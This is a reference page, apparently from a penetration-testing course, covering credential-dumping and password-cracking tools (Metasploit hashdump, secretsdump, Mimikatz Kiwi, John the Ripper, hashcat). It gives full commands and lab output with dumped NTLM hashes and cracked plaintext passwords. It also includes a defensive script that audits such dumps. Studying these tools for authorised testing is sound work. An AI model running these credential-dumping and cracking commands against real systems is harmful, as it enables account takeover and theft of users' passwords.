smart_hashdump

⚠ Use on Domain Controllers only. Use the regular hashdump for non-DCs.

Description

This will dump local accounts from the SAM database. If the target host is a Domain Controller, it will dump the Domain Account Database using the proper technique for the privilege level, OS and role of the host.

Platform: Windows
Author: Carlos Perez
License: BSD 3-Clause
URL: smart_hashdump.rb

Usage

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  GETSYSTEM  false            no        Attempt to get SYSTEM privilege on the target host.
  SESSION                     yes       The session to run this module on

Examples

run post/windows/gather/smart_hashdump

This is all there is to it.

Blog Posts

secretsdump.py

Description

Performs various techniques to dump hashes from the remote machine without executing any agent there. For SAM and LSA Secrets (including cached creds) it reads as much as it can from the registry, then saves the hives on the target system (in the %SYSTEMROOT%\Temp directory) and reads the rest of the data from there.

Platform: Python
Author: Alberto Solino
License: Modified Apache License 1.1
URL: secretsdump.py

Usage

Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
 
usage: secretsdump.py [-h] [-ts] [-debug] [-system SYSTEM] [-bootkey BOOTKEY]
                      [-security SECURITY] [-sam SAM] [-ntds NTDS]
                      [-resumefile RESUMEFILE] [-outputfile OUTPUTFILE]
                      [-use-vss] [-exec-method [{smbexec,wmiexec,mmcexec}]]
                      [-just-dc-user USERNAME] [-just-dc] [-just-dc-ntlm]
                      [-pwd-last-set] [-user-status] [-history]
                      [-hashes LMHASH:NTHASH] [-no-pass] [-k]
                      [-aesKey hex key] [-keytab KEYTAB] [-dc-ip ip address]
                      [-target-ip ip address]
                      target
 
Performs various techniques to dump secrets from the remote machine without
executing any agent there.
 
positional arguments:
  target                [[domain/]username[:password]@]<targetName or address>
                        or LOCAL (if you want to parse local files)
 
optional arguments:
  -h, --help            show this help message and exit
  -ts                   Adds timestamp to every logging output
  -debug                Turn DEBUG output ON
  -system SYSTEM        SYSTEM hive to parse
  -bootkey BOOTKEY      bootkey for SYSTEM hive
  -security SECURITY    SECURITY hive to parse
  -sam SAM              SAM hive to parse
  -ntds NTDS            NTDS.DIT file to parse
  -resumefile RESUMEFILE
                        resume file name to resume NTDS.DIT session dump (only
                        available to DRSUAPI approach). This file will also be
                        used to keep updating the session's state
  -outputfile OUTPUTFILE
                        base output filename. Extensions will be added for
                        sam, secrets, cached and ntds
  -use-vss              Use the VSS method insead of default DRSUAPI
  -exec-method [{smbexec,wmiexec,mmcexec}]
                        Remote exec method to use at target (only when using
                        -use-vss). Default: smbexec
 
display options:
  -just-dc-user USERNAME
                        Extract only NTDS.DIT data for the user specified.
                        Only available for DRSUAPI approach. Implies also
                        -just-dc switch
  -just-dc              Extract only NTDS.DIT data (NTLM hashes and Kerberos
                        keys)
  -just-dc-ntlm         Extract only NTDS.DIT data (NTLM hashes only)
  -pwd-last-set         Shows pwdLastSet attribute for each NTDS.DIT account.
                        Doesn't apply to -outputfile data
  -user-status          Display whether or not the user is disabled
  -history              Dump password history, and LSA secrets OldVal
 
authentication:
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from
                        ccache file (KRB5CCNAME) based on target parameters.
                        If valid credentials cannot be found, it will use the
                        ones specified in the command line
  -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256
                        bits)
  -keytab KEYTAB        Read keys for SPN from keytab file
 
connection:
  -dc-ip ip address     IP Address of the domain controller. If ommited it use
                        the domain part (FQDN) specified in the target
                        parameter
  -target-ip ip address
                        IP Address of the target machine. If omitted it will
                        use whatever was specified as target. This is useful
                        when target is the NetBIOS name and you cannot resolve
                        it

Examples

secretsdump.py -ntds ./ntds.dit -system ./system -outputfile /tmp/hashes.txt LOCAL

This will dump the hashes from a saved copy of ntds.dit using the encryption key in a saved copy of the SYSTEM hive.

Blog Posts

Mimikatz Kiwi

Description

Mimikatz is a well-known tool to extract plaintext passwords, hashes, PIN codes and Kerberos tickets from memory. Mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden Tickets. Kiwi is the Metasploit implementation.

Platform: Windows
Author: gentilkiwi (Benjamin DELPY)
License: Creative Commons 4.0
URL: https://blog.gentilkiwi.com/mimikatz

Usage

Kiwi Commands
=============
 
    Command                Description
    -------                -----------
    creds_all              Retrieve all credentials (parsed)
    creds_kerberos         Retrieve Kerberos creds (parsed)
    creds_livessp          Retrieve Live SSP creds
    creds_msv              Retrieve LM/NTLM creds (parsed)
    creds_ssp              Retrieve SSP creds
    creds_tspkg            Retrieve TsPkg creds (parsed)
    creds_wdigest          Retrieve WDigest creds (parsed)
    dcsync                 Retrieve user account information via DCSync (unparsed)
    dcsync_ntlm            Retrieve user account NTLM hash, SID and RID via DCSync
    golden_ticket_create   Create a golden kerberos ticket
    kerberos_ticket_list   List all kerberos tickets (unparsed)
    kerberos_ticket_purge  Purge any in-use kerberos tickets
    kerberos_ticket_use    Use a kerberos ticket
    kiwi_cmd               Execute an arbitary mimikatz command (unparsed)
    lsa_dump_sam           Dump LSA SAM (unparsed)
    lsa_dump_secrets       Dump LSA secrets (unparsed)
    password_change        Change the password/hash of a user
    wifi_list              List wifi profiles/creds for the current user
    wifi_list_shared       List shared wifi profiles/creds (requires SYSTEM)

Examples

load kiwi

This command will load the Mimikatz module in a Meterpreter session.

meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/
 
Success.

creds_all

This will attempt to dump all the Windows credentials from RAM.

meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
 
Username  Domain         NTLM                              SHA1
--------  ------         ----                              ----
sec       SECSTUDENT     396f460962c665bc648db299d55f1ba2  4029ce95b7a89f3c63148d94e789c0350e069ef4
 
wdigest credentials
===================
 
Username        Domain         Password
--------        ------         --------
(null)          (null)         (null)
SECSTUDENT$     SEC            (null)
sec             SECSTUDENT     (null)
 
kerberos credentials
====================
 
Username        Domain         Password
--------        ------         --------
(null)          (null)         (null)
sec             SEC            sec123
secstudent$     SEC            (null)

Blog Posts

hashdump

Description

This module will dump the local user accounts from the SAM database using the registry.

Platform: Windows
Author: Metasploit
License: BSD 3-Clause
URL: hashdump.rb

Usage

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on

Examples

run post/windows/gather/hashdump

Here are the results of running this command from a meterpreter session.

meterpreter > run post/windows/gather/hashdump
 
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 2609c40b5e36c810763cbc8bf8962276...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
 
No users with password hints on this system
 
[*] Dumping password hashes...
 
 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e0d68f3bf01ad13902472922c3921dad:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:58f8e0214224aebc2c5f82fb7cb47ca1:::
SROCAdmin:1008:aad3b435b51404eeaad3b435b51404ee:2e920723943f81ec0af0fd735f737fef:::
antivirus:1009:aad3b435b51404eeaad3b435b51404ee:47f0ca5913c6e70090d7b686afb9e13e:::
slopez:1010:aad3b435b51404eeaad3b435b51404ee:87e968ead530264915a4b295c57c37d5:::
aparker:1011:aad3b435b51404eeaad3b435b51404ee:9b5684b030226a1203e4e7b718a3f9df:::
rgray:1012:aad3b435b51404eeaad3b435b51404ee:23d26a03aa7102abce4805d88e568a78:::
wrobinson:1013:aad3b435b51404eeaad3b435b51404ee:5deaec4b57b859c25cdd0513fb7bc750:::
mlara:1014:aad3b435b51404eeaad3b435b51404ee:d8d9eee954da5f2d42fe72f862fa493f:::
lstout:1015:aad3b435b51404eeaad3b435b51404ee:ca3f0e9ce3188b0602742da2976d6773:::
tandersen:1016:aad3b435b51404eeaad3b435b51404ee:bf459116e5854e34031997be8e13596d:::
awalker:1017:aad3b435b51404eeaad3b435b51404ee:fe1f27a2561b61511588b0d24e333a7c:::
mmiller:1018:aad3b435b51404eeaad3b435b51404ee:7a1f1fd59eb2b97041c74748ea6a68f8:::
vcollins:1019:aad3b435b51404eeaad3b435b51404ee:5bd9b7b6fce76d3aabfebee9debaa932:::
jrivera:1020:aad3b435b51404eeaad3b435b51404ee:baa90a3ad89d359009ce5425063dff3e:::
hhopkins:1021:aad3b435b51404eeaad3b435b51404ee:92929561b2758f409df2b4a24a59c6f4:::
kcooper:1022:aad3b435b51404eeaad3b435b51404ee:5ae44bf0a1e24c0b1ec96708f30e7b84:::
ksutton:1023:aad3b435b51404eeaad3b435b51404ee:a6051a02b7a2bfb4cd0e2c1a9cb4a694:::
rduarte:1024:aad3b435b51404eeaad3b435b51404ee:7ce56170c73f9582fa348db88de2c192:::
dwilliams:1025:aad3b435b51404eeaad3b435b51404ee:c6fd7d8bb36d8862c1b978896a6bec51:::
nramos:1026:aad3b435b51404eeaad3b435b51404ee:0f46bafd2c4acdac0003a1ff4da92625:::
abates:1027:aad3b435b51404eeaad3b435b51404ee:62a56ba1b94193d7f553b895bca28292:::
khansen:1028:aad3b435b51404eeaad3b435b51404ee:fc9fdcdbf09c5be4928287e4ad847dd7:::
vberry:1029:97abc432e5e8e8a03b9ce0ab2b8f2634:d99438ebb5f67b113dab1f907e26979b:::
cgentry:1030:aad3b435b51404eeaad3b435b51404ee:059db5a4061f5a2cb5053e753f9664b4:::
sbates:1031:aad3b435b51404eeaad3b435b51404ee:4f8bfa5d78d7a6398915c9657cd49769:::
dbryant:1032:aad3b435b51404eeaad3b435b51404ee:858bf9272facf23b3593f609e5b64c06:::
srichardson:1033:aad3b435b51404eeaad3b435b51404ee:819dc07ca50e1729d72214e8e9ee8f3a:::
kkennedy:1034:aad3b435b51404eeaad3b435b51404ee:7c3acf216ef4ec061b9330e0ad103c35:::
scook:1035:aad3b435b51404eeaad3b435b51404ee:2d474458480f9aa524ba3ebb1f3f9e6e:::
pmartin:1036:aad3b435b51404eeaad3b435b51404ee:98f9db311936bea281e9a65f45dd1f62:::
egeorge:1037:aad3b435b51404eeaad3b435b51404ee:f482c3342543f49df31a5a240a0558cf:::
phorne:1038:aad3b435b51404eeaad3b435b51404ee:b9a04517b70e549f8b2e4153ee8f4107:::
ckhan:1039:aad3b435b51404eeaad3b435b51404ee:aff059fe35c553548f56db9c85b2d90c:::
dmckenzie:1040:aad3b435b51404eeaad3b435b51404ee:50a173c77e22c87c419cacb5e0629b52:::

Blog Posts

John the Ripper

Description

John the Ripper is an Open Source password security auditing and password recovery tool available for many operating systems.

Platform: All
Author: Openwall
License: GPLv3
URL: https://www.openwall.com/john/

Usage

John the Ripper 1.9.0-jumbo-1 OMP [linux-gnu 64-bit x86_64 AVX2 AC]
Copyright (c) 1996-2019 by Solar Designer and others
Homepage: http://www.openwall.com/john/
 
Usage: john [OPTIONS] [PASSWORD-FILES]
--single[=SECTION[,..]]    "single crack" mode, using default or named rules
--single=:rule[,..]        same, using "immediate" rule(s)
--wordlist[=FILE] --stdin  wordlist mode, read words from FILE or stdin
                  --pipe   like --stdin, but bulk reads, and allows rules
--loopback[=FILE]          like --wordlist, but extract words from a .pot file
--dupe-suppression         suppress all dupes in wordlist (and force preload)
--prince[=FILE]            PRINCE mode, read words from FILE
--encoding=NAME            input encoding (eg. UTF-8, ISO-8859-1). See also
                           doc/ENCODINGS and --list=hidden-options.
--rules[=SECTION[,..]]     enable word mangling rules (for wordlist or PRINCE
                           modes), using default or named rules
--rules=:rule[;..]]        same, using "immediate" rule(s)
--rules-stack=SECTION[,..] stacked rules, applied after regular rules or to
                           modes that otherwise don't support rules
--rules-stack=:rule[;..]   same, using "immediate" rule(s)
--incremental[=MODE]       "incremental" mode [using section MODE]
--mask[=MASK]              mask mode using MASK (or default from john.conf)
--markov[=OPTIONS]         "Markov" mode (see doc/MARKOV)
--external=MODE            external mode or word filter
--subsets[=CHARSET]        "subsets" mode (see doc/SUBSETS)
--stdout[=LENGTH]          just output candidate passwords [cut at LENGTH]
--restore[=NAME]           restore an interrupted session [called NAME]
--session=NAME             give a new session the NAME
--status[=NAME]            print status of a session [called NAME]
--make-charset=FILE        make a charset file. It will be overwritten
--show[=left]              show cracked passwords [if =left, then uncracked]
--test[=TIME]              run tests and benchmarks for TIME seconds each
--users=[-]LOGIN|UID[,..]  [do not] load this (these) user(s) only
--groups=[-]GID[,..]       load users [not] of this (these) group(s) only
--shells=[-]SHELL[,..]     load users with[out] this (these) shell(s) only
--salts=[-]COUNT[:MAX]     load salts with[out] COUNT [to MAX] hashes
--costs=[-]C[:M][,...]     load salts with[out] cost value Cn [to Mn]. For
                           tunable cost parameters, see doc/OPTIONS
--save-memory=LEVEL        enable memory saving, at LEVEL 1..3
--node=MIN[-MAX]/TOTAL     this node's number range out of TOTAL count
--fork=N                   fork N processes
--pot=NAME                 pot file to use
--list=WHAT                list capabilities, see --list=help or doc/OPTIONS
--devices=N[,..]           set OpenCL device(s) (see --list=opencl-devices)
--format=NAME              force hash of type NAME. The supported formats can
                           be seen with --list=formats and --list=subformats

Examples

john ~/labs/web01.hashes

This will run john in default mode and try to crack the hashes in the provided file.

msf6 exploit(windows/smb/psexec) > john labs/web01.hashes
Warning: detected hash type "LM", but the string is also recognized as "NT"
Use the "--format=NT" option to force loading these as that type instead
Warning: detected hash type "LM", but the string is also recognized as "LM-opencl"
Use the "--format=LM-opencl" option to force loading these as that type instead
Warning: detected hash type "LM", but the string is also recognized as "NT-opencl"
Use the "--format=NT-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Using default target encoding: CP850
Loaded 38 password hashes with no different salts (LM [DES 256/256 AVX2])
Warning: poor OpenMP scalability for this hash type, consider --fork=2
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Warning: Only 78 candidates buffered for the current salt, minimum 512 needed for performance.
Proceeding with wordlist:/usr/local/share/john/password.lst, rules:Wordlist
                 (dmckenzie)
                 (ckhan)
                 (phorne)
                 (egeorge)
                 (pmartin)
                 (scook)
                 (kkennedy)
                 (srichardson)
                 (dbryant)
                 (sbates)
                 (cgentry)
                 (khansen)
                 (abates)
                 (nramos)
                 (dwilliams)
                 (rduarte)
                 (ksutton)
                 (kcooper)
                 (hhopkins)
                 (jrivera)
                 (vcollins)
                 (mmiller)
                 (awalker)
                 (tandersen)
                 (lstout)
                 (mlara)
                 (wrobinson)
                 (rgray)
                 (aparker)
                 (slopez)
                 (antivirus)
                 (SROCAdmin)
                 (WDAGUtilityAccount)
                 (DefaultAccount)
                 (Guest)
                 (Administrator)
Proceeding with incremental:LM_ASCII
MIMIGOT          (vberry:1)
KNENZ2G          (vberry:2)
38g 0:00:00:02 DONE 3/3 (2022-03-17 01:29) 15.01g/s 40495Kp/s 40495Kc/s 48036KC/s KNEIRS8..KNENZ2G
Warning: passwords printed above might be partial
Use the "--show --format=LM" options to display all of the cracked passwords reliably
Session completed

john ~/labs/web01.hashes --show

This command will show which passwords have already been cracked in the given file.

sec560@slingshot:~$ sudo john labs/web01.hashes --show
Administrator::500:aad3b435b51404eeaad3b435b51404ee:1ef98de8555541f1579f98084f32875b:::
Guest::501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount::503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount::504:aad3b435b51404eeaad3b435b51404ee:58f8e0214224aebc2c5f82fb7cb47ca1:::
SROCAdmin::1008:aad3b435b51404eeaad3b435b51404ee:2e920723943f81ec0af0fd735f737fef:::
antivirus::1009:aad3b435b51404eeaad3b435b51404ee:47f0ca5913c6e70090d7b686afb9e13e:::
slopez::1010:aad3b435b51404eeaad3b435b51404ee:87e968ead530264915a4b295c57c37d5:::
aparker::1011:aad3b435b51404eeaad3b435b51404ee:9b5684b030226a1203e4e7b718a3f9df:::
rgray::1012:aad3b435b51404eeaad3b435b51404ee:23d26a03aa7102abce4805d88e568a78:::
wrobinson::1013:aad3b435b51404eeaad3b435b51404ee:5deaec4b57b859c25cdd0513fb7bc750:::
mlara::1014:aad3b435b51404eeaad3b435b51404ee:d8d9eee954da5f2d42fe72f862fa493f:::
lstout::1015:aad3b435b51404eeaad3b435b51404ee:ca3f0e9ce3188b0602742da2976d6773:::
tandersen::1016:aad3b435b51404eeaad3b435b51404ee:bf459116e5854e34031997be8e13596d:::
awalker::1017:aad3b435b51404eeaad3b435b51404ee:fe1f27a2561b61511588b0d24e333a7c:::
mmiller::1018:aad3b435b51404eeaad3b435b51404ee:7a1f1fd59eb2b97041c74748ea6a68f8:::
vcollins::1019:aad3b435b51404eeaad3b435b51404ee:5bd9b7b6fce76d3aabfebee9debaa932:::
jrivera::1020:aad3b435b51404eeaad3b435b51404ee:baa90a3ad89d359009ce5425063dff3e:::
hhopkins::1021:aad3b435b51404eeaad3b435b51404ee:92929561b2758f409df2b4a24a59c6f4:::
kcooper::1022:aad3b435b51404eeaad3b435b51404ee:5ae44bf0a1e24c0b1ec96708f30e7b84:::
ksutton::1023:aad3b435b51404eeaad3b435b51404ee:a6051a02b7a2bfb4cd0e2c1a9cb4a694:::
rduarte::1024:aad3b435b51404eeaad3b435b51404ee:7ce56170c73f9582fa348db88de2c192:::
dwilliams::1025:aad3b435b51404eeaad3b435b51404ee:c6fd7d8bb36d8862c1b978896a6bec51:::
nramos::1026:aad3b435b51404eeaad3b435b51404ee:0f46bafd2c4acdac0003a1ff4da92625:::
abates::1027:aad3b435b51404eeaad3b435b51404ee:62a56ba1b94193d7f553b895bca28292:::
khansen::1028:aad3b435b51404eeaad3b435b51404ee:fc9fdcdbf09c5be4928287e4ad847dd7:::
vberry:MIMIGOTKNENZ2G:1029:97abc432e5e8e8a03b9ce0ab2b8f2634:d99438ebb5f67b113dab1f907e26979b:::
cgentry::1030:aad3b435b51404eeaad3b435b51404ee:059db5a4061f5a2cb5053e753f9664b4:::
sbates::1031:aad3b435b51404eeaad3b435b51404ee:4f8bfa5d78d7a6398915c9657cd49769:::
dbryant::1032:aad3b435b51404eeaad3b435b51404ee:858bf9272facf23b3593f609e5b64c06:::
srichardson::1033:aad3b435b51404eeaad3b435b51404ee:819dc07ca50e1729d72214e8e9ee8f3a:::
kkennedy::1034:aad3b435b51404eeaad3b435b51404ee:7c3acf216ef4ec061b9330e0ad103c35:::
scook::1035:aad3b435b51404eeaad3b435b51404ee:2d474458480f9aa524ba3ebb1f3f9e6e:::
pmartin::1036:aad3b435b51404eeaad3b435b51404ee:98f9db311936bea281e9a65f45dd1f62:::
egeorge::1037:aad3b435b51404eeaad3b435b51404ee:f482c3342543f49df31a5a240a0558cf:::
phorne::1038:aad3b435b51404eeaad3b435b51404ee:b9a04517b70e549f8b2e4153ee8f4107:::
ckhan::1039:aad3b435b51404eeaad3b435b51404ee:aff059fe35c553548f56db9c85b2d90c:::
dmckenzie::1040:aad3b435b51404eeaad3b435b51404ee:50a173c77e22c87c419cacb5e0629b52:::
 
38 password hashes cracked, 0 left
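A small audit script over the two dump layouts shown above (the hashdump listing, `user:RID:LM:NT:::`, and the john --show listing, `user:plaintext:RID:LM:NT:::`), added here as an example; it is not part of Metasploit, John the Ripper or this page. It uses only the Python standard library. The two constant hashes are the empty-password LM and NT values visible in the listings (the repeated `aad3b435...` LM field and the Guest/DefaultAccount NT field); the sample dump reuses records from the page plus a constructed `helpdesk` account to show password reuse. From a defender's side this is the check you run on a dump you obtained during an authorised audit: which accounts still have an LM hash stored, which have a blank password, which share a password, and which are already cracked.

```python
import re
from collections import defaultdict

# Hash of the empty password under each algorithm; both values appear in the
# listings on this page. A field equal to EMPTY_LM means "no LM hash stored".
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

_HEX32 = re.compile(r"^[0-9a-f]{32}$")


def parse_line(line):
    """Parse one pwdump-style record.

    Accepts both layouts seen on this page:
      user:RID:LMhash:NThash:::            (hashdump / secretsdump)
      user:plaintext:RID:LMhash:NThash:::  (john --show)
    Returns (user, plaintext_or_None, rid, lm, nt), or None for any other line
    (status messages, blank lines, banners).
    """
    fields = line.strip().split(":")
    if len(fields) == 7 and fields[1].isdigit():
        user, plain, rid, lm, nt = fields[0], None, fields[1], fields[2], fields[3]
    elif len(fields) == 8 and fields[2].isdigit():
        user, plain, rid, lm, nt = fields[0], fields[1] or None, fields[2], fields[3], fields[4]
    else:
        return None
    lm, nt = lm.lower(), nt.lower()
    if not (_HEX32.match(lm) and _HEX32.match(nt)):
        return None
    return user, plain, int(rid), lm, nt


def audit(lines):
    """Return a report of weak-credential indicators found in a dump."""
    records = [r for r in map(parse_line, lines) if r is not None]
    users_by_nt = defaultdict(set)
    findings = []
    for user, plain, _rid, lm, nt in records:
        users_by_nt[nt].add(user)
        if lm != EMPTY_LM:
            # A stored LM hash means the password is at most 14 characters,
            # uppercased and hashed as two independent 7-character halves.
            findings.append((user, "LM hash stored"))
        if nt == EMPTY_NT:
            findings.append((user, "empty password"))
        if plain is not None:
            findings.append((user, "already cracked"))
    for nt, users in users_by_nt.items():
        if len(users) > 1 and nt != EMPTY_NT:
            findings.append((",".join(sorted(users)), "shared password"))
    return {
        "records": len(records),
        "accounts": len({r[0] for r in records}),
        "findings": findings,
    }


# Constructed sample: records from the listings above plus a made-up "helpdesk"
# account that reuses the Administrator NT hash, and one john --show line.
SAMPLE_DUMP = """\
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e0d68f3bf01ad13902472922c3921dad:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
vberry:1029:97abc432e5e8e8a03b9ce0ab2b8f2634:d99438ebb5f67b113dab1f907e26979b:::
helpdesk:1041:aad3b435b51404eeaad3b435b51404ee:e0d68f3bf01ad13902472922c3921dad:::
vberry:MIMIGOTKNENZ2G:1029:97abc432e5e8e8a03b9ce0ab2b8f2634:d99438ebb5f67b113dab1f907e26979b:::
"""

if __name__ == "__main__":
    report = audit(SAMPLE_DUMP.splitlines())
    print(f"{report['records']} records, {report['accounts']} distinct accounts")
    for who, what in report["findings"]:
        print(f"  {what:16} {who}")
```

Run it against a real dump with `audit(open("web01.hashes").read().splitlines())`. Accounts flagged with "LM hash stored" are the ones to fix first: the vberry record above is the only account whose LM field is not the empty-password constant, and it is exactly the account john cracked in seconds in the default-mode run, while the other 37 required the NT wordlist pass. Blank-password hits on built-in accounts such as Guest and DefaultAccount are normally disabled accounts; confirm with `-user-status` in secretsdump or the account's status in AD before treating them as findings.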

john --format=nt --wordlist=/opt/passwords/rockyou.txt ~/labs/web01.hashes

The following is the output when you run john with a wordlist.

sec560@slingshot:~$ sudo john --format=nt --wordlist=/opt/passwords/rockyou.txt ~/labs/web01.hashes
Using default input encoding: UTF-8
Loaded 36 password hashes with no different salts (NT [MD4 256/256 AVX2 8x3])
Remaining 35 password hashes with no different salts
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
Warrior07        (vcollins)
Tibbetts3        (slopez)
Patrique2238     (wrobinson)
Packardbell350   (mlara)
Oozle11          (aparker)
KAMTPS20!!tim    (rgray)
Chirmol01        (awalker)
BHLMSTz2         (mmiller)
Angels100%       (tandersen)
2soWht!a         (lstout)
10g 0:00:00:00 DONE (2022-03-17 01:46) 10.30g/s 14787Kp/s 14787Kc/s 475458KC/s  Ttwwl789..*7¡Vamos!
Warning: passwords printed above might not be all those cracked
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed

zip2john file.zip

This will produce a crackable hash from an encrypted zip file. In the run below the output is redirected into a file named backup.hashes, which john can then load.

└─$ zip2john ./backup.zip > ./backup.hashes
ver 2.0 efh 5455 efh 7875 backup.zip/index.php PKZIP Encr: TS_chk, cmplen=1201, decmplen=2594, crc=3A41AE06 ts=5722 cs=5722 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/style.css PKZIP Encr: TS_chk, cmplen=986, decmplen=3274, crc=1B1CCD6A ts=989A cs=989a type=8
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.

john --format=Raw-MD5 --wordlist=./wordlist8.txt ./passhash.txt

This command will attempt to crack a raw MD5 password hash using the wordlist.

└─$ john --format=Raw-MD5 --wordlist=./wordlist8.txt ./passhash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 128/128 AVX 4x3])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
qwerty789        (?)    
1g 0:00:00:00 DONE (2022-03-27 14:12) 50.00g/s 1891Kp/s 1891Kc/s 1891KC/s snapdragon..play2win
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed.

Blog Posts

hashcat

Description

World’s fastest password cracker

Platform: All
Author: Jens Steube
License: MIT
URL: https://hashcat.net/hashcat/

Usage

hashcat (v6.2.4) starting in help mode
 
Usage: hashcat [options]... hash|hashfile|hccapxfile [dictionary|mask|directory]...
 
- [ Options ] -
 
 Options Short / Long           | Type | Description                                          | Example
================================+======+======================================================+=======================
 -m, --hash-type                | Num  | Hash-type, references below (otherwise autodetect)   | -m 1000
 -a, --attack-mode              | Num  | Attack-mode, see references below                    | -a 3
 -V, --version                  |      | Print version                                        |
 -h, --help                     |      | Print help                                           |
     --quiet                    |      | Suppress output                                      |
     --hex-charset              |      | Assume charset is given in hex                       |
     --hex-salt                 |      | Assume salt is given in hex                          |
     --hex-wordlist             |      | Assume words in wordlist are given in hex            |
     --force                    |      | Ignore warnings                                      |
     --deprecated-check-disable |      | Enable deprecated plugins                            |
     --status                   |      | Enable automatic update of the status screen         |
     --status-json              |      | Enable JSON format for status output                 |
     --status-timer             | Num  | Sets seconds between status screen updates to X      | --status-timer=1
     --stdin-timeout-abort      | Num  | Abort if there is no input from stdin for X seconds  | --stdin-timeout-abort=300
     --machine-readable         |      | Display the status view in a machine-readable format |
     --keep-guessing            |      | Keep guessing the hash after it has been cracked     |
     --self-test-disable        |      | Disable self-test functionality on startup           |
     --loopback                 |      | Add new plains to induct directory                   |
     --markov-hcstat2           | File | Specify hcstat2 file to use                          | --markov-hcstat2=my.hcstat2
     --markov-disable           |      | Disables markov-chains, emulates classic brute-force |
     --markov-classic           |      | Enables classic markov-chains, no per-position       |
 -t, --markov-threshold         | Num  | Threshold X when to stop accepting new markov-chains | -t 50
     --runtime                  | Num  | Abort session after X seconds of runtime             | --runtime=10
     --session                  | Str  | Define specific session name                         | --session=mysession
     --restore                  |      | Restore session from --session                       |
     --restore-disable          |      | Do not write restore file                            |
     --restore-file-path        | File | Specific path to restore file                        | --restore-file-path=x.restore
 -o, --outfile                  | File | Define outfile for recovered hash                    | -o outfile.txt
     --outfile-format           | Str  | Outfile format to use, separated with commas         | --outfile-format=1,3
     --outfile-autohex-disable  |      | Disable the use of $HEX[] in output plains           |
     --outfile-check-timer      | Num  | Sets seconds between outfile checks to X             | --outfile-check=30
     --wordlist-autohex-disable |      | Disable the conversion of $HEX[] from the wordlist   |
 -p, --separator                | Char | Separator char for hashlists and outfile             | -p :
     --stdout                   |      | Do not crack a hash, instead print candidates only   |
     --show                     |      | Compare hashlist with potfile; show cracked hashes   |
     --left                     |      | Compare hashlist with potfile; show uncracked hashes |
     --username                 |      | Enable ignoring of usernames in hashfile             |
     --remove                   |      | Enable removal of hashes once they are cracked       |
     --remove-timer             | Num  | Update input hash file each X seconds                | --remove-timer=30
     --potfile-disable          |      | Do not write potfile                                 |
     --potfile-path             | File | Specific path to potfile                             | --potfile-path=my.pot
     --encoding-from            | Code | Force internal wordlist encoding from X              | --encoding-from=iso-8859-15
     --encoding-to              | Code | Force internal wordlist encoding to X                | --encoding-to=utf-32le
     --debug-mode               | Num  | Defines the debug mode (hybrid only by using rules)  | --debug-mode=4
     --debug-file               | File | Output file for debugging rules                      | --debug-file=good.log
     --induction-dir            | Dir  | Specify the induction directory to use for loopback  | --induction=inducts
     --outfile-check-dir        | Dir  | Specify the outfile directory to monitor for plains  | --outfile-check-dir=x
     --logfile-disable          |      | Disable the logfile                                  |
     --hccapx-message-pair      | Num  | Load only message pairs from hccapx matching X       | --hccapx-message-pair=2
     --nonce-error-corrections  | Num  | The BF size range to replace AP's nonce last bytes   | --nonce-error-corrections=16
     --keyboard-layout-mapping  | File | Keyboard layout mapping table for special hash-modes | --keyb=german.hckmap
     --truecrypt-keyfiles       | File | Keyfiles to use, separated with commas               | --truecrypt-keyf=x.png
     --veracrypt-keyfiles       | File | Keyfiles to use, separated with commas               | --veracrypt-keyf=x.txt
     --veracrypt-pim-start      | Num  | VeraCrypt personal iterations multiplier start       | --veracrypt-pim-start=450
     --veracrypt-pim-stop       | Num  | VeraCrypt personal iterations multiplier stop        | --veracrypt-pim-stop=500
 -b, --benchmark                |      | Run benchmark of selected hash-modes                 |
     --benchmark-all            |      | Run benchmark of all hash-modes (requires -b)        |
